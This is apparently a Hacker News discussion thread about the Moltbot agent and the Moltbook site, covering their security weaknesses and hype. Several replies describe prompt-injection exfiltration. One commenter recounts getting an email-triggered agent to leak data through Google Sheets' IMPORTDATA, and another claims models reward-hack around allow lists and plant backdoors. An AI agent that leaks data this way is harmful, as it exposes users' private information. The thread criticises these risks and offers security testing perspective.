← Back to context

Comment by SimianSci

10 hours ago

I was quite stunned at the success of Moltbot/moltbook, but I think im starting to understand it better these days. Most of Moltbook's success rides on the "prepackaged" aspect of its agent. Its a jump in accessibility to general audiences which are paying alot more attention to the tech sector than in previous decades. Most of the people paying attention to this space dont have the technical capabilities that many engineers do, so a highly perscriptive "buy mac mini, copy a couple of lines to install" appeals greatly, especially as this will be the first "agent" many of them will have interacted with.

The landscape of security was bad long before the metaphorical "unwashed masses" got hold of it. Now its quite alarming as there are waves of non-technical users doing the bare minimum to try and keep up to date with the growing hype.

The security nightmare happening here might end up being more persistant then we realize.

Is it a success? What would that mean, for a social media site that isn't meant for humans?

The site has 1.5 million agents but only 17,000 human "owners" (per Wiz's analysis of the leak).

It's going viral because a some high-profile tastemakers (Scott Alexander and Andrej Karpathy) have discussed/Tweeted about it, and a few other unscrupulous people are sharing alarming-looking things out of context and doing numbers.

  • > What would that mean, for a social media site that isn't meant for humans?

    For a social media that isn't meant for humans, some humans seem to enjoy it a lot, although indirectly.

    • This is the equivalent of a toddler being entertained by the sound the straps on their Velcro shoes make when they get peeled back and forth.

That's a bit of an understatement. Every single LLM is 100% vulnerable by design. There is no way to close the hole. Simple mitigations like "allow lists" can be trivially worked around, either by prompt injection, or by the AI just deciding to work around it itself (reward hacking). The only solution is to segregate the LLM from all external input, and prevent it from making outbound network calls. And though MCPs and jails are the beginning of a mitigation for it, it gets worse: the AI can write obfuscated backdoors and slip them into your vibe-coded apps, either as code, or instructions to be executed by LLM later.

It's a machine designed to fight all your attempts to make it secure.

  • ya... the number of ways to infiltrate a malicious prompt and exfil data is overwhelming almost unlimited. Any tool that can hit a arbitrary url or make a dns request is basic an exfil path.

    I recently did a test of a system that was triggering off email and had access to write to google sheets. Easy exfil via `IMPORTDATA`, but there's probably hundreds of ways to do it.

  • Moltbot is not de regieur prompt injection, i.e. the "is it instructions or data?" built-in vulnerability.

    This was "I'm going to release an open agent with an open agents directory with executable code, and it'll operate your personal computer remotely!", I deeply understand the impulse, but, there's a fine line between "cutting edge" and "irresponsible & making excuses."

    I'm uncertain what side I would place it on.

    I have a soft spot for the author, and a sinking feeling that without the soft spot, I'd certainly choose "irresponsible".

"Buy a mac mini, copy a couple of lines to install" is marketing fluff. It's incredibly easy to trip moltbot into a config error, and its context management is also a total mess. The agent will outright forget the last 3 messages after compaction occurs even though the logs are available on disk. Finally, it never remembers instructions properly.

Overall, it's a good idea but incredibly rough due to what I assume is heavy vibe coding.

I agree with the prepackaging aspect, cita HN's dismissal of Dropbox. In the meantime, The global enterprise with all its might has not been able to stop high profile computer hacks/data leaks from happening. I don't think people will cry over a misconfigured supabase database. It's nothing worse than what's already out there.

Sure everybody wants security and that's what they will say but does that really translate to reduced inferred value of vibe code tools? I haven't seen evidence

  • I agree that people will pick the marginal value of a tool over the security that comes from not using it. Security has always been something invisible to the public. But im reminded of things like several earlier Botnets which simply took advantage of the millions of routers or IoT devices that never configured their logins beyond the default admin credentials. The very same botnets have been used as the tools to enable many crimes across the globe. Having several agent based systems out there being operated by non-technical users can lead to an evolution of a "botnet" being far more capable than previous ones.

    Ive not quite convinced myself this is where we are headed, but the signs that make me worried that systems such as Moltbot will further enable ascendency of global crime and corruption.

Is it actually a success, or are people just talking about it a lot?

  • Kind of feels like many see "people are talking about it a lot" as the same thing as "success" in this and many other cases, which I'm maybe not sure agreeing with.

    As far as I can tell, since agents are using Moltbook, it's a success of sorts already is in "has users", otherwise I'm not really sure what success looks like for a budding hivemind.

> Its a jump in accessibility to general audiences which are paying alot more attention to the tech sector than in previous decades.

Oh totally, both my wife and one of my brother have, independently, started to watch Youtube vids about vibe coding. They register domain names and let AI run wild with little games and tools. And now they're talking me all day long about agents.

> Most of the people paying attention to this space dont have the technical capabilities ...

It's just some anecdata on my side but I fully agree.

> The security nightmare happening here might end up being more persistant then we realize.

I'm sure we're in for a good laugh. It already started: TFA is eye opening. And funny too.